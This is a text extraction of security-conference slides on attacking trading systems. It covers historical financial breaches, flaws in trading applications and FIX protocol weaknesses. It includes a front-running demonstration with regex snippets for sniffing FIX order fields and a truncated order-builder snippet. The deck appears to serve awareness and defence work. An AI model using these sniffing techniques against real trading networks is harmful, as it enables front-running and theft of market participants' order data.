hacking the trading floor
DESCRIPTION
TRANSCRIPT
![Page 1: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/1.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Gyan Chawdhary
Hacking The Trading Floor
Session ID: HT2-304Session Classification:
Intermediate
![Page 2: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/2.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Agenda
2
BRIEF HISTORY OF ECONOMIC HACKS
APPLICATION ISSUES
FIX ATTACKS
![Page 3: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/3.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
3
Brief History of Economic Hacks
![Page 4: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/4.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Brief History Of Security Compromises in the Banking Sector
4
![Page 5: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/5.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
More Recently … (2008-2010)
Sergey Aleynikov, former Goldman Sachs computer programmer/prop trader indicted and prosecuted on charges of HFT algorithm theft.
UBS filed a lawsuit against three former quants alleging to have stolen proprietary algorithmic trading software with the intent of using it at their new employer.
Ukrainian hacker Oleksandr Dorozhko charged for insider trading by SEC. Mr Dorozhko traded option contracts on information gained by accessing earnings data from a staging server prior to their release date.
5
![Page 6: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/6.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Even More Recently … (Dec 2010 - Jan 2011)
Romanian Registry (Carbon Trading Platform) 1.6 million CO2 certificated from Holcim
Cement account were stolen. Credits were transferred to hacker controlled accounts in EU states.
Czech / Austrian Registry (Carbon Trading Platform) Two million credits worth 2.8 million were
stolen and transferred to other registries and / or sold to other market participants.
6
![Page 7: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/7.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Even More Recently … (Dec 2010 - Jan 2011)
NASDAQ Director’s Desk Application Currently being investigated for a potential
breach, the Directors Desk application is an EMS application that allows executives to share sensitive documents including earnings data, board minutes etc.
7
![Page 8: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/8.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Common Theme / Trends
Attackers are still leveraging the low hanging fruit in terms of security issues used to compromise these systems.
As of 2011, the threats are increasing both in scale and sophistication.
Outsider threat is increasing
8
![Page 9: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/9.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
9
Application Security
![Page 10: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/10.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Studies
Trade Optimized Strategy Engine Issues OTC Trading Platforms Issues Thick Client Trading Platforms Issues Reconciliation Platform Issues Indices Application Insecurities Computational Grid Attacks
10
![Page 11: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/11.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Trade Optimized Strategy Engine
WHAT Class of applications used for submission and
analysis of investment/trading strategies.
WHO Used mainly by Funds/Banks/Investment
Management firms employing Global Macro/Event driven trading strategies
HOW Third party Brokers, Analysts, Economists access the
application to upload trading strategies/ideas. The application uses both statistical and/or
proprietary algorithms to index/rate submitted strategies
Traders trade the most optimum strategy 11
![Page 12: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/12.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Study - Trade Optimized Strategy Engine Issues (Weak Input Validation)
12
![Page 13: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/13.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Problems
Infrastructure Issues Application Issues
Governance
13
![Page 14: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/14.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
OTC Trading Platforms
WHAT Predominantly dealer applications for trading over-
the-counter derivatives.
WHO Used by almost all banks dealing in credit derivatives
markets - CDO, CDS, IRS etc Mainly used for structuring instruments, based on
client requirements which are then traded directly or through a dealer.
Mainly used by front office quants/traders
HOW Trades are executed using commercial and/or
bespoke platforms etc Post Trade processing can be carried in-house or
outsourced. 14
![Page 15: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/15.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Study – Bank OTC Trading Platform Issues (Trade Data / Client Discovery Attack)
15
![Page 16: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/16.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Problems
Application Issues
Governance
16
![Page 17: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/17.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Thick Client Trading Platforms
WHAT Any front, middle or back office trading
application. Often developed for business/analyst staff
and/or used to extend trading services to third-party clients.
17
![Page 18: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/18.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Study - Thick Client Trading Platform Issues (Forex Broker-Dealer Application)
18
![Page 19: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/19.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Problems
Application Issues
19
![Page 20: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/20.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Study - Reconciliation Platform Issues
![Page 21: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/21.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Indices Applications
Definition Index - A basket/collection/group of securities
to track the performance of a market/sector/asset.
Can be traded as Futures/Options contracts or used as the underlying for other products.
WHO Mostly developed and managed by Exchanges,
Rating agencies and Banks.
HOW A committee or bespoke methods /
benchmarks are used to rebalance indices. 21
![Page 22: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/22.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Study - Index Rebalancing/Turnover Attacks
22
![Page 23: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/23.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Computational Grids
WHAT High performance computing grids used for
running solvers, simulations and analysis of financial time series data. (Monitcarlo, Volatility, OP etc)
WHO Mostly institutions and departments involved
with financial modeling. Users tend to be quants, traders and analysts.
HOW Models are submitted to the grid environment
using Web services, custom APIs and/or remote access.
23
![Page 24: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/24.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Case Study - Computational Grid Attacks
![Page 25: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/25.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Problems
Infrastructure Issues Application Issues
.
Governance
25
![Page 26: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/26.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
26
FIX Protocol Weaknesses
![Page 27: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/27.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
What is FIX Protocol ?
The Financial Information eXchange (FIX) protocol is an electronic communications protocol initiated in 1992 for international real-time exchange of information related to the securities transactions and markets – Wikipeda
In other words, the protocol facilitates the buying and selling of securities electronically.
27
![Page 28: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/28.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Who Uses FIX
FIX is widely used by both the buy side (institutions) as well as the sell side (brokers/dealers) in the financial markets.
Amongst its users are hedge funds, mutual funds, investment banks, brokers and stock exchanges
Transaction types supported: Pretty much all asset classes i.e Equities, Bond, Derivatives and Forex.
28
![Page 29: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/29.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Who Uses FIX
29
![Page 30: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/30.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Why Investigate FIX ?
FIX security is often overlooked in favor of Operating System and Host Security
To demonstrate that FIX based front running is possible and not difficult to exploit
To identify mitigating factors and strategies for some of the existing issues within FIX protocol
30
![Page 31: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/31.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Algorithmic Trading Architecture
31
![Page 32: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/32.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
High Frequency Trading Architecture
32
![Page 33: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/33.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Order Front Running (Demo)
Demo Environment: Algorithmic Trading Environment – A simulated
algorithmic/high frequency trading environment
Brokerage Account – Hacker Controlled brokerage account to reply orders.
Order Sniffer - Note
The following examples used during this demonstration are not intended to suggest any insecurities or weaknesses in the third party applications and are only to be seen as a case study to demonstrate FIX protocol insecurities.
33
![Page 34: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/34.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Algorithmic Trading Environment
34
![Page 35: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/35.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Brokerage Account
35
![Page 36: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/36.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Order Front Running
36
1
2
3
![Page 37: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/37.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
LibPcap FIX Sniffing (Slow)
symbol = re.compile('55=[A-Z]*') # Symbol (APPL, GOOG .. )
buy = re.compile('54=1') # BUY Order
sell = re.compile('54=2') # SELL Order
order_qty = re.compile('38=[0-9]*') # Order quantity
price = re.compile('44=[0-9]*') # Equity Price
37
![Page 38: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/38.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Fix Virus
38
![Page 39: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/39.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Cont
39
![Page 40: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/40.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Binary Tree _
40
![Page 41: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/41.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Fast FIX walker (C++)
41
![Page 42: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/42.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Order Builder
42
![Page 43: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/43.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Hedgefund Example - Weak Wifi + FIX sniffer
43
![Page 44: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/44.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
IbPy Server Side Code - Contract Builder
def build_stock_contract(symbol, quantity, oid):
stock.m_symbol = symbol
stock.m_secType = 'STK'
stock.m_exchange = 'SMART'
stock.m_currency = 'USD'
Order.m_orderId = oid
Order.m_clientId = 0
Order.m_permid = 0
Order.m_action = 'BUY'
Order.m_lmtPrice = 0
Order.m_auxPrice = 0
Order.m_tif = 'DAY'
Order.m_transmit = False
Order.m_orderType = 'MKT'
Order.m_totalQuantity = quantit
44
![Page 45: Hacking The Trading Floor](https://reader033.vdocuments.site/reader033/viewer/2022061222/54c2537b4a7959bd728b45c3/html5/thumbnails/45.jpg)
Insert presenter logo here on slide master. See hidden slide 2 for directions
Order Sniffer (Excel plugin) – order encoding
45